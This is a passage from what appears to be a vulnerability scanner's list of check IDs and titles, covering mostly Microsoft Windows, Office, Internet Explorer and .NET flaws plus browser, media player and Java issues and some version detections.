Messenger ActiveX Control Vulnerability (2508272) [900280] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2508429) [900266] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (2424434) [900263] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (2296199) [900248] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (981997) [900241] Microsoft Outlook Express and Windows Mail Remote Code Execution Vulnerability (978542) [900240] Microsoft Exchange and Windows SMTP Service Denial of Service Vulnerability (981832) [900237] Microsoft Windows Authentication Verification Remote Code Execution Vulnerability (981210) [900236] Microsoft Windows Kernel Could Allow Elevation of Privilege (979683) [900235] Microsoft Windows Media Player Could Allow Remote Code Execution (979402) [900232] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561) [900230] Microsoft Windows SMB Server Multiple Vulnerabilities (971468) [900227] Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) [900178] Microsoft Windows 'UnhookWindowsHookEx' Local DoS Vulnerability [900173] Microsoft Windows Media Player Version Detection [900172] Microsoft Windows Media Player 'MIDI' or 'DAT' File DoS Vulnerability [900108] Microsoft Windows NSlookup.exe Remote Code Execution Vulnerability [803007] Microsoft Windows Minimum Certificate Key Length Spoofing Vulnerability (2661254) [802888] Microsoft Windows Media Service Handshake Sequence DoS Vulnerability [802634] Microsoft Windows Unauthorized Digital Certificates Spoofing Vulnerability (2718704) [802500] Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability [802426] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2647518) [802383] Microsoft Windows Color Control Panel Privilege Escalation Vulnerability [802379] Microsoft Windows Kernel 'win32k.sys' Memory Corruption Vulnerability [802260] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [802140] Microsoft Explorer HTTPS Sessions Multiple Vulnerabilities (Windows) [802136] Microsoft Windows Insecure Library Loading Vulnerability (2269637) [801991] Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability [801966] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937) [801914] Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability [801719] Microsoft Windows CSRSS CSRFinalizeContext Local Privilege Escalation Vulnerability (930178) [801718] Microsoft Windows Vista Information Disclosure Vulnerability (931213) [801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [801716] Microsoft Outlook Express/Windows Mail MHTML URI Handler Information Disclosure Vulnerability (929123) [801713] Microsoft Outlook Express And Windows Mail NNTP Protocol Heap Buffer Overflow Vulnerability (941202) [801706] Microsoft Windows TCP/IP Remote Code Execution Vulnerabilities (941644) [801705] Microsoft Windows TCP/IP Denial of Service Vulnerability (946456) [801701] Microsoft Windows DNS Client Service Response Spoofing Vulnerability (945553) [801669] Microsoft Windows IIS FTP Server DOS Vulnerability [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability [801580] Microsoft Windows Fax Cover Page Editor BOF Vulnerabilities [801527] Microsoft Windows 32-bit Platforms Unspecified vulnerabilities [801487] Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693) [801486] Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability (950760) [801484] Microsoft Windows IPsec Policy Processing Information Disclosure Vulnerability (953733) [801483] Microsoft Windows Search Remote Code Execution Vulnerability (959349) [801482] Microsoft Windows ASP.NET Denial of Service Vulnerability(970957) [801479] Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145) [801457] Microsoft Windows Address Book Insecure Library Loading Vulnerability [801456] Microsoft Windows Progman Group Converter Insecure Library Loading Vulnerability [801333] Microsoft Windows Kernel 'win32k.sys' Multiple DOS Vulnerabilities [801090] Microsoft Windows Indeo Codec Multiple Vulnerabilities [800862] Microsoft Windows Kernel win32k.sys Privilege Escalation Vulnerability [800687] Microsoft Windows Server 2003 OpenType Font Engine DoS Vulnerability [800577] Microsoft Windows Server 2003 win32k.sys DoS Vulnerability [800504] Microsoft Windows XP SP3 denial of service vulnerability [800480] Microsoft Windows Media Player '.mpg' Buffer Overflow Vulnerability [800466] Microsoft Windows TLS/SSL Spoofing Vulnerability (977377) [800442] Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability [800332] Microsoft Windows Live Messenger Information Disclosure Vulnerability [800331] Microsoft Windows Live Messenger Client Version Detection [800328] Integer Overflow vulnerability in Microsoft Windows Media Player [800310] Microsoft Windows Media Services nskey.dll ActiveX BOF Vulnerability [800023] Microsoft Windows Image Color Management System Code Execution Vulnerability (952954) [102059] Microsoft Windows Vector Markup Language Buffer Overflow (938127) [102055] Microsoft Windows GDI Multiple Vulnerabilities (925902) [102053] Microsoft Windows Vector Markup Language Vulnerabilities (929969) [100624] Microsoft Windows SMTP Server DNS spoofing vulnerability [100596] Microsoft Windows SMTP Server MX Record Denial of Service Vulnerability [100283] Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability [90024] Windows Vulnerability in Microsoft Jet Database Engine [903037] Microsoft JScript and VBScript Engines Remote Code Execution Vulnerability (2706045) [903030] Google Chrome Multiple Vulnerabilities(02) - May 12 (Windows) [903029] Apple Safari Multiple Vulnerabilities - Oct 2011 (Windows) [903026] Microsoft Office Remote Code Execution Vulnerabilities (2663830) [903017] Microsoft Office Remote Code Execution Vulnerability (2639185) [903014] Adobe Flash Player/Air Code Execution and DoS Vulnerabilities (Windows) [903007] Google Chrome Full Sandbox Escape and Code Execution Vulnerability (Windows) [903004] Google Chrome Multiple Vulnerabilities (Windows) - Mar 12 [903003] GOM Media Player 'Open URL' Feature Unspecified Vulnerability (Windows) [903002] GOM Media Player 'AVI' File Unspecified Vulnerability (Windows) [903000] Microsoft Expression Design Remote Code Execution Vulnerability (2651018) [902934] Microsoft .NET Framework Remote Code Execution Vulnerability (2745030) [902932] Microsoft Internet Explorer Multiple Use-After-Free Vulnerabilities (2761451) [902931] Microsoft Office Remote Code Execution Vulnerabilities - 2720184 (Mac OS X) [902930] Microsoft Office Remote Code Execution Vulnerabilities (2720184) [902923] Microsoft Internet Explorer Multiple Vulnerabilities (2722913) [902922] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2723135) [902921] Microsoft Office Visio/Viewer Remote Code Execution Vulnerability (2733918) [902920] Microsoft Office Remote Code Execution Vulnerability (2731879) [902919] Microsoft SharePoint Privilege Elevation Vulnerabilities (2663841) [902917] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2709162) [902914] Microsoft IIS GET Request Denial of Service Vulnerability [902913] Microsoft Office Remote Code Execution Vulnerabilities-2663830 (Mac OS X) [902912] Microsoft Office Word Remote Code Execution Vulnerability-2680352 (Mac OS X) [902911] Microsoft Office Word Remote Code Execution Vulnerability (2680352) [902910] Microsoft Office Visio Viewer Remote Code Execution Vulnerability (2597981) [902907] Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2641653) [902903] Google Chrome Multiple Vulnerabilities - Jan12 (Windows) [902842] Microsoft Lync Remote Code Execution Vulnerabilities (2707956) [902841] Microsoft .NET Framework Remote Code Execution Vulnerability (2706726) [902839] Microsoft FrontPage Server Extensions MS-DOS Device Name DoS Vulnerability [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows) [902836] PHP 'com_print_typeinfo()' Remote Code Execution Vulnerability (Windows) [902833] Microsoft .NET Framework Remote Code Execution Vulnerability (2693777) [902832] MS Security Update For Microsoft Office, .NET Framework, and Silverlight (2681578) [902828] Microsoft .NET Framework Remote Code Execution Vulnerability (2671605) [902818] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902817] Microsoft Visual Studio Privilege Elevation Vulnerability (2651019) [902811] Microsoft .NET Framework and Microsoft Silverlight Remote Code Execution Vulnerabilities (2651026) [902810] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2660465) [902808] IBM Lotus Symphony Image Object Integer Overflow Vulnerability (Windows) [902798] Microsoft SMB Signing Enabled and Not Required At Server [902797] Microsoft SMB Signing Information Disclosure Vulnerability [902796] Microsoft IIS IP Address/Internal Network Name Disclosure Vulnerability [902792] MS Windows Indeo Codec Remote Code Execution Vulnerability (2661637) [902791] MS Windows Color Control Panel Remote Code Execution Vulnerability (2643719) [902786] Oracle VM VirtualBox Multiple Unspecified Vulnerabilities (Windows) [902785] Microsoft AntiXSS Library Information Disclosure Vulnerability (2607664) [902781] Windows Media Player Denial Of Service Vulnerability [902775] Mozilla Products Multiple Vulnerabilities - Dec 11 (Windows) [902774] Mozilla Products DOMAttrModified Memory Corruption Vulnerability (Windows) [902770] FFFTP Untrusted Search Path Vulnerability (Windows) - Dec 11 [902768] MS Windows Active Directory Remote Code Execution Vulnerability (2640045) [902767] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902765] Adobe Flex SDK 'SWF' Files Cross-Site Scripting Vulnerability (Windows) [902760] ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows) [902746] Microsoft Active Accessibility Remote Code Execution Vulnerability (2623699) [902738] Adobe Flash Player Multiple Vulnerabilities September-2011 (Windows) [902727] Microsoft Office Excel Remote Code Execution Vulnerabilities (2587505) [902709] Adobe Air and Flash Player Multiple Vulnerabilities August-2011 (Windows) [902708] Microsoft Remote Desktop Protocol Denial of Service Vulnerability (2570222) [902705] VLC Media Player '.AVI' File BOF Vulnerability (Windows) [902704] VLC Media Player '.RM' File BOF Vulnerability (Windows) [902696] Microsoft Internet Explorer Multiple Vulnerabilities (2761465) [902692] Microsoft Office Excel ReadAV Arbitrary Code Execution Vulnerability [902689] Microsoft SQL Server Report Manager Cross Site Scripting Vulnerability (2754849) [902688] Microsoft System Center Configuration Manager XSS Vulnerability (2741528) [902686] Microsoft Internet Explorer Multiple Vulnerabilities (2719177) [902683] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2685939) [902682] Microsoft Internet Explorer Multiple Vulnerabilities (2699988) [902679] Google SketchUp '.SKP' File Remote Code Execution Vulnerability (Windows) [902678] Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X) [902670] Microsoft Internet Explorer Multiple Vulnerabilities (2675157) [902669] Windows Authenticode Signature Remote Code Execution Vulnerability (2653956) [902666] Opera Multiple Vulnerabilities - March12 (Windows) [902663] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902662] MicroSoft SMB Server Trans2 Request Remote Code Execution Vulnerability [902660] Microsoft SMB Transaction Parsing Remote Code Execution Vulnerability [902658] Microsoft RDP Server Private Key Information Disclosure Vulnerability [902657] Windows ClickOnce Application Installer Remote Code Execution Vulnerability (2584146) [902653] MS Windows C Run-Time Library Remote Code Execution Vulnerability (2654428) [902649] Microsoft Internet Explorer Multiple Vulnerabilities (2647516) [902645] Google Chrome Multiple Vulnerabilities - December11 (Windows) [902643] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2620712) [902642] Microsoft Internet Explorer Multiple Vulnerabilities (2618444) [902638] Apple iTunes Remote Code Execution Vulnerability (Windows) [902635] Google Chrome V8 Remote Code Execution Vulnerability (Windows) [902626] Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048) [902625] Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858) [902614] Google Chrome Secure Cookie Security Bypass Vulnerability (Windows) [902613] Microsoft Internet Explorer Multiple Vulnerabilities (2559049) [902603] VLC Media Player XSPF Playlist Integer Overflow Vulnerability (Windows) [902581] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2604930) [902580] Microsoft Host Integration Server Denial of Service Vulnerabilities (2607670) [902567] Microsoft Office Remote Code Execution Vulnerabilites (2587634) [902561] McAfee SaaS Endpoint Protection Version Detection (Windows) [902552] Microsoft .NET Framework Chart Control Information Disclosure Vulnerability (2567943) [902551] Microsoft .NET Framework Information Disclosure Vulnerability (2567951) [902549] Oracle VM VirtualBox Unspecified Vulnerability (Windows) [902546] IBM Informix Dynamic Server Oninit Remote Code Execution Vulnerability (Windows) [902545] IBM Informix Dynamic Server Version Detection (Windows) [902538] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2555917) [902529] ejabberd Version Detection (Windows) [902527] ejabberd XML Parsing Denial of Service Vulnerability (Windows) [902525] Oracle Java SE Multiple Unspecified Vulnerabilities 01 - June11 (Windows) [902524] Oracle Java SE Multiple Unspecified Vulnerabilities - June11 (Windows) [902523] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2514842) [902522] Microsoft .NET Framework Remote Code Execution Vulnerability (2538814) [902518] Microsoft .NET Framework Security Bypass Vulnerability [902502] Microsoft .NET Framework Remote Code Execution Vulnerability (2484015) [902501] Microsoft JScript and VBScript Scripting Engines Remote Code Execution Vulnerability (2514666) [902499] MS Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2646524) [902496] Microsoft Office IME (Chinese) Privilege Elevation Vulnerability (2652016) [902495] Microsoft Office Remote Code Execution Vulnerability (2590602) [902494] Microsoft Office Excel Remote Code Execution Vulnerability (2640241) [902493] Microsoft Publisher Remote Code Execution Vulnerabilities (2607702) [902492] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2639142) [902486] Windows Mail and Windows Meeting Space Remote Code Execution Vulnerability (2620704) [902485] Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2617657) [902483] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902482] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability (2592799) [902464] Microsoft Visio Remote Code Execution Vulnerabilities (2560978) [902455] Microsoft Visio Remote Code Execution Vulnerability (2560847) [902445] Microsoft XML Editor Information Disclosure Vulnerability (2543893) [902444] MS Windows Threat Management Gateway Firewall Client Remote Code Execution Vulnerability (2520426 [902443] Microsoft Internet Explorer Multiple Vulnerabilities (2530548) [902442] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability [902441] Windows MHTML Information Disclosure Vulnerability (2544893) [902430] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2545814) [902424] MS Windows Ancillary Function Driver Privilege Elevation Vulnerabilities (2645640) [902423] Microsoft Office Visio Viewer Remote Code Execution Vulnerabilities (2663510) [902411] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2489283) [902410] Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279) [902409] Windows MHTML Information Disclosure Vulnerability (2503658) [902408] Windows Fax Cover Page Editor Remote Code Execution Vulnerability (2527308) [902400] Adobe Products Remote Memory Corruption Vulnerability (Windows) [902399] LibreOffice LWP File Processing Multiple Buffer Overflow Vulnerabilities (Windows) [902398] LibreOffice Version Detection (Windows) [902395] Microsoft Bluetooth Stack Remote Code Execution Vulnerability (2566220) [902392] Google Chrome Multiple Vulnerabilities (Windows) - June 11 [902387] Adobe Reader/Acrobat Security Bypass Vulnerability (Windows) [902382] Google Chrome Multiple Vulnerabilities May11 (Windows) [902379] Adobe Reader/Acrobat Memory Corruption Vulnerability (Windows) [902378] Microsoft Office Excel Remote Code Execution Vulnerabilities (2537146) [902373] Adobe Audition '.ses' Multiple Buffer Overflow Vulnerabilities (Windows) [902365] Microsoft GDI+ Remote Code Execution Vulnerability (2489979) [902364] Microsoft Office Remote Code Execution Vulnerabilites (2489293) [902363] Windows OpenType Compact Font Format (CFF) Driver Remote Code Execution Vulnerability (2507618) [902353] Oracle Java SE Code Execution Vulnerabilities (Windows) [902351] Microsoft Groove Remote Code Execution Vulnerability (2494047) [902350] Oracle Java SE Code Execution Vulnerability (Windows-01) [902349] Oracle Java SE Code Execution Vulnerability (Windows) [902347] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902344] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902341] VLC Media Player USF and Text Subtitles Decoders BOF Vulnerabilities (Windows) [902340] VLC Media Player '.mkv' Code Execution Vulnerability (Windows) [902336] Microsoft JScript and VBScript Scripting Engines Information Disclosure Vulnerability (2475792) [902334] Vulnerability in Windows Shell Graphics Processing Could Allow Remote Code Execution (2483185) [902333] Tor Unspecified Heap Based Buffer Overflow Vulnerability (Windows) [902325] Microsoft Internet Explorer 'CSS Import Rule' Use-after-free Vulnerability [902324] Microsoft SharePoint Could Allow Remote Code Execution Vulnerability (2455005) [902323] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (981957) [902322] Windows Local Procedure Call Privilege Elevation Vulnerability (2360937) [902319] Microsoft Foundation Classes Could Allow Remote Code Execution Vulnerability (2387149) [902306] Mozilla Products 'js_InitRandom' Information Disclosure Vulnerability (Windows) [902305] Mozilla Firefox Information Disclosure Vulnerability (Windows) [902303] Adobe Products Content Code Execution Vulnerability (Windows) [902301] Windows Client/Server Runtime Subsystem Privilege Elevation Vulnerability (2121546) [902293] Metasploit Framework Version Detection (Windows) [902288] Microsoft Kerberos Privilege Escalation Vulnerabilities (2496930) [902287] Microsoft Visio Remote Code Execution Vulnerabilities (2451879) [902285] Microsoft Internet Explorer Information Disclosure Vulnerability (2501696) [902278] MS Windows ICSW Remote Code Execution Vulnerability (2443105) [902275] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2436673) [902274] Microsoft Publisher Remote Code Execution Vulnerability (2292970) [902265] Microsoft Office Word Remote Code Execution Vulnerabilities (2293194) [902264] Microsoft Office Excel Remote Code Execution Vulnerabilities (2293211) [902255] Microsoft Visual Studio Insecure Library Loading Vulnerability [902254] Microsoft Office Products Insecure Library Loading Vulnerability [902250] Microsoft Word 2003 'MSO.dll' Null Pointer Dereference Vulnerability [902246] Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability [902243] Microsoft Outlook TNEF Remote Code Execution Vulnerability (2315011) [902242] Mozilla Products Insecure Library Loading Vulnerability (Windows) [902239] Wireshark File Opening Insecure Library Loading Vulnerability (Windows) [902238] Skype Insecure Library Loading Vulnerability (Windows) [902230] Microsoft .NET Common Language Runtime Remote Code Execution Vulnerability (2265906) [902229] Microsoft Window MPEG Layer-3 Remote Code Execution Vulnerability (2115168) [902228] Microsoft Office Word Remote Code Execution Vulnerabilities (2269638) [902217] Microsoft Outlook SMB Attachment Remote Code Execution Vulnerability (978212) [902210] Microsoft IE cross-domain IFRAME gadgets keystrokes steal Vulnerability [902204] Mozilla Products Multiple Vulnerabilities june-10 (Windows) [902203] Opera Browser Multiple Vulnerabilities (Windows) [902197] Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows) [902196] Wireshark SMB dissector Denial of Service Vulnerability (Windows) [902195] Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows) [902193] Microsoft .NET Framework XML HMAC Truncation Vulnerability (981343) [902192] Microsoft Office COM Validation Remote Code Execution Vulnerability (983235) [902191] Microsoft Internet Explorer Multiple Vulnerabilities (982381) [902186] Mozilla Firefox Multiple Denial Of Service vulnerabilities (Windows) [902185] Mozilla Products 'IFRAME' Denial Of Service vulnerability (Windows) [902183] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability [902182] Opera Browser Multiple Denial Of Service Vulnerability (Windows) [902178] Microsoft Visual Basic Remote Code Execution Vulnerability (978213) [902176] Microsoft SharePoint '_layouts/help.aspx' Cross Site Scripting Vulnerability [902167] Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows) [902166] Microsoft Internet Explorer 'neutering' Mechanism XSS Vulnerability [902161] Adobe Acrobat and Reader PDF Handling Multiple Vulnerabilities (Windows) [902159] Microsoft VBScript Scripting Engine Remote Code Execution Vulnerability (980232) [902158] Microsoft Office Publisher Remote Code Execution Vulnerability (981160) [902157] Microsoft 'ISATAP' Component Spoofing Vulnerability (978338) [902156] Microsoft SMB Client Remote Code Execution Vulnerabilities (980232) [902155] Microsoft Internet Explorer Multiple Vulnerabilities (980182) [902151] Microsoft Internet Explorer Denial of Service Vulnerability - Mar10 [902149] Mozilla Products Multiple Vulnerabilities Mar-10 (Windows) [902147] Mozilla Firefox Unspecified Vulnerability Mar-10 (Windows) [902133] Microsoft Office Excel Multiple Vulnerabilities (980150) [902130] Mozilla Products Multiple Vulnerabilities feb-10 (Windows) [902128] Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows) [902120] Google Chrome Multiple Vulnerabilities - (Windows) [902117] Microsoft DirectShow Remote Code Execution Vulnerability (977935) [902116] Microsoft Client/Server Run-time Subsystem Privilege Elevation Vulnerability (978037) [902115] Microsoft Kerberos Denial of Service Vulnerability (977290) [902114] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (975416) [902112] Microsoft SMB Client Remote Code Execution Vulnerabilities (978251) [902098] Novell iPrint Client Multiple Vulnerabilities (windows) [902095] Microsoft Office Excel Remote Code Execution Vulnerability (2269707) [902080] Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593) [902075] XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows) [902073] Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10 [902069] Microsoft SharePoint Privilege Elevation Vulnerabilities (2028554) [902068] Microsoft Office Excel Remote Code Execution Vulnerabilities (2027452) [902060] Cybozu Office Authentication Bypass Vulnerability (Windows) [902045] aMSN session hijack vulnerability (Windows) [902044] aMSN Version Detection (Windows) [902039] Microsoft Visio Remote Code Execution Vulnerabilities (980094) [902038] Microsoft MPEG Layer-3 Codecs Remote Code Execution Vulnerability (977816) [902027] Mozilla Firefox Unspecified Vulnerability (Windows) [902015] Microsoft Paint Remote Code Execution Vulnerability (978706) [901210] Microsoft Office Privilege Elevation Vulnerability - 2721015 (Mac OS X) [901208] Microsoft Internet Explorer Multiple Vulnerabilities (2586448) [901197] Google Chrome multiple vulnerabilities - March 11 (Windows) [901190] Google Chrome Use-After-Free Vulnerability (Windows) [901182] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2479628) [901181] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2476687) [901180] Microsoft Internet Explorer Multiple Vulnerabilities (2482017) [901174] OpenSC Version Detection (Windows) [901173] Windows Backup Manager Remote Code Execution Vulnerability (2478935) [901166] Microsoft Office Remote Code Execution Vulnerabilites (2423930) [901165] Windows Common Control Library Remote Code Execution Vulnerability (2296011) [901162] Microsoft Internet Explorer Multiple Vulnerabilities (2360131) [901161] Microsoft ASP.NET Information Disclosure Vulnerability (2418042) [901153] Google Chrome multiple vulnerabilities Sep-10 (Windows) [901151] Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960) [901145] FreeType Unspecified Vulnerability (Windows) [901144] FreeType Version Detection (Windows) [901143] FreeType Memory Corruption and Buffer Overflow Vulnerabilities (Windows) [901142] FreeType Multiple denial of service vulnerabilities (Windows) [901139] Microsoft Internet Explorer Multiple Vulnerabilities (2183461) [901120] Microsoft IIS Authentication Remote Code Execution Vulnerability (982666) [901097] Microsoft Internet Explorer Multiple Vulnerabilities (978207) [901095] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (972270) [901082] IBM DB2 UDB Multiple Unspecified Vulnerabilities (Windows) [901069] Microsoft Office Project Remote Code Execution Vulnerability (967183) [901047] MS Windows License Logging Server Remote Code Execution Vulnerability (974783) [901041] Microsoft Internet Explorer Multiple Code Execution Vulnerabilities (974455) [901039] Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682) [900973] Microsoft Office Word Remote Code Execution Vulnerability (976307) [900964] Microsoft .NET Common Language Runtime Code Execution Vulnerability (974378) [900944] Microsoft IIS FTP Server 'ls' Command DOS Vulnerability [900929] Microsoft JScript Scripting Engine Remote Code Execution Vulnerability (971961) [900898] Microsoft Internet Explorer 'XSS Filter' XSS Vulnerabilities - Nov09 [900897] Microsoft Internet Explorer PDF Information Disclosure Vulnerability - Nov09 [900891] Microsoft Internet Denial Of Service Vulnerability - Nov09 [900887] Microsoft Office Excel Multiple Vulnerabilities (972652) [900878] Microsoft Products GDI Plus Code Execution Vulnerabilities (957488) [900874] Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) [900863] Microsoft Internet Explorer 'window.print()' DOS Vulnerability [900837] Microsoft DHTML Editing Component ActiveX Remote Code Execution Vulnerability (956844) [900836] Microsoft Internet Explorer Address Bar Spoofing Vulnerability [900826] Microsoft Internet Explorer 'location.hash' DOS Vulnerability [900813] Microsoft Remote Desktop Connection Remote Code Execution Vulnerability (969706) [900809] Microsoft Visual Studio ATL Remote Code Execution Vulnerability (969706) [900808] Microsoft Visual Products Version Detection [900799] Ruby Interpreter Version Detection (Windows) [900752] XnView DICOM Parsing Integer Overflow Vulnerability (Windows) [900741] Microsoft Internet Explorer Information Disclosure Vulnerability Feb10 [900725] Ruby Interpreter Heap Overflow Vulnerability (Windows) - Dec09 [900724] Windows XP 'SPI_GETDESKWALLPAPER' DoS Vulnerability [900711] Microsoft IIS WebDAV Remote Authentication Bypass Vulnerability [900690] Microsoft Virtual PC/Server Privilege Escalation Vulnerability (969856) [900689] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (961371)) [900670] Microsoft Office Excel Remote Code Execution Vulnerabilities (969462) [900669] Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537) [900589] Microsoft ISA Server Privilege Escalation Vulnerability (970953) [900588] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900567] Microsoft IIS Security Bypass Vulnerability (970483) [900566] Microsoft Active Directory LDAP Remote Code Execution Vulnerability (969805) [900479] PostgreSQL Version Detection (Windows) [900476] Microsoft Excel Remote Code Execution Vulnerabilities (968557) [900461] Microsoft MSN Live Messneger Denial of Service Vulnerability [900445] Microsoft Autorun Arbitrary Code Execution Vulnerability (08-038) [900400] Microsoft Internet Explorer Unicode String DoS Vulnerability [900391] Microsoft Office Publisher Remote Code Execution Vulnerability (969516) [900366] Microsoft Internet Explorer Web Script Execution Vulnerabilites [900365] Microsoft Office Word Remote Code Execution Vulnerabilities (969514) [900337] Microsoft Internet Explorer Denial of Service Vulnerability - Apr09 [900328] Microsoft Internet Explorer Remote Code Execution Vulnerability (963027) [900322] Tor Replay Attack Vulnerability (Windows) [900314] Microsoft XML Core Service Information Disclosure Vulnerability [900303] Microsoft Internet Explorer HTML Form Value DoS Vulnerability [900302] MS Windows taskmgr.exe Information Disclosure Vulnerability [900299] Microsoft Report Viewer Information Disclosure Vulnerability (2578230) [900298] MS Windows Remote Access Service NDISTAPI Driver Privilege Elevation Vulnerability (2566454) [900294] Microsoft Data Access Components Remote Code Execution Vulnerabilities (2560656) [900288] Microsoft Distributed File System Remote Code Execution Vulnerabilities (2535512) [900287] Microsoft SMB Client Remote Code Execution Vulnerabilities (2536276) [900285] Microsoft Foundation Class (MFC) Library Remote Code Execution Vulnerability (2500212) [900283] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2506223) [900282] Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553) [900279] Microsoft SMB Client Remote Code Execution Vulnerabilities (2511455) [900278] Microsoft Internet Explorer Multiple Vulnerabilities (2497640) [900273] Microsoft Remote Desktop Client Remote Code Execution Vulnerability (2508062) [900267] Microsoft Media Decompression Remote Code Execution Vulnerability (2447961) [900262] Microsoft Internet Explorer Multiple Vulnerabilities (2416400) [900261] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2293386) [900246] Microsoft Media Decompression Remote Code Execution Vulnerability (979902) [900245] Microsoft Data Analyzer and IE Developer Tools ActiveX Control Vulnerability (980195) [900229] Microsoft Data Analyzer ActiveX Control Vulnerability (978262) [900228] Microsoft Office (MSO) Remote Code Execution Vulnerability (978214) [900223] Microsoft Ancillary Function Driver Elevation of Privilege Vulnerability (956803) [900218] IBM DB2 Server Detection (Windows) [900192] Microsoft Internet Explorer Information Disclosure Vulnerability [900187] Microsoft Internet Explorer Argument Injection Vulnerability [900170] Microsoft iExplorer '&NBSP [900131] Microsoft Internet Explorer Denial of Service Vulnerability [900128] CuteNews Version Detection for Windows [900125] Microsoft SQL Server 2000 sqlvdir.dll ActiveX Buffer Overflow Vulnerability [900123] Apple iTunes Version Detection for Windows [900120] Microsoft Organization Chart Remote Code Execution Vulnerability [900097] Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution [900095] Microsoft ISA Server and Forefront Threat Management Gateway DoS Vulnerability (961759) [900094] Vulnerabilities in Windows Could Allow Elevation of Privilege (959454) [900093] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900092] Windows HTTP Services Could Allow Remote Code Execution Vulnerabilities (960803) [900086] Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690) [900080] Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634) [900079] Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239) [900064] Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175) [900063] Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173) [900061] Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070) [900060] Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807) [900058] Microsoft XML Core Services Remote Code Execution Vulnerability (955218) [900052] Windows Internet Printing Service Allow Remote Code Execution Vulnerability (953155) [900051] Windows Kernel Elevation of Privilege Vulnerability (954211) [900048] Microsoft Excel Remote Code Execution Vulnerability (956416) [900047] Microsoft Office nformation Disclosure Vulnerability (957699) [900046] Microsoft Office Remote Code Execution Vulnerabilities (955047) [900045] Windows Media Player 11 Remote Code Execution Vulnerability (954154) [900044] Windows Media Encoder 9 Remote Code Execution Vulnerability (954156) [900036] Opera Version Detection for Windows [900034] Windows Messenger Could Allow Information Disclosure Vulnerability (955702) [900033] Microsoft PowerPoint Could Allow Remote Code Execution Vulnerabilities (949785) [900029] Microsoft Office Filters Could Allow Remote Code Execution Vulnerabilities 